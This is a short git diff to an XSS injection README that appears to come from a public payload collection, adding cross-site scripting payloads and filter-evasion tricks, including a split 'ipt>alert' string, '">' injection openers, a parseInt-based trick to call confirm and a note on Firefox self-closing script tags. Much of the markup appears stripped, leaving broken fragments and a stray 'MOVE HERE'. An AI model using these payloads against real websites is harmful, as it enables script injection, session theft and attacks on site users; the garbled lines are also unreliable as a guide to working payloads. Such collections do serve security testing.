diff --git a/XSS Injection/README.md b/XSS Injection/README.md index 43804cd..641d526 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md @@ -158,6 +158,9 @@ Most tools are also suitable for blind XSS attacks: ipt>alert('XSS')ipt> "> "> + + + //parseInt("confirm",30) == 8680439 && 8680439..toString(30) == "confirm" // Img payload @@ -177,6 +180,8 @@ Most tools are also suitable for blind XSS attacks: "> ">(`Firefox` is the only browser which allows self closing script) +
MOVE HERE